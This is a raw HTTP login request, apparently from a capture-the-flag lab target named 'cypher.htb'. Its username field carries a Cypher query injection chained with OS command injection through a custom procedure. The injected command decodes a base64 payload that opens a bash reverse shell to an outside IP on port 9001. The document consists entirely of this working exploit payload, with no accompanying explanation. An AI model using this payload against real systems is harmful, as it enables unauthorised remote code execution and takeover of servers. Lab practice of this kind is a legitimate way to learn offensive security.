POST/api/auth HTTP/1.1 Host: cypher.htb Content-Length: 236 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Content-Type: application/json Origin: http://cypher.htb Referer: http://cypher.htb/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive
{"username":"admin' or 1=1 \n RETURN h.value as hash union CALL custom.getUrlStatusCode('http://10.10.16.22:8001 && echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMjIvOTAwMSAgMD4mMSAn|base64 -d|bash') \n yield statusCode as value \n RETURN value as hash//","password":"123456"}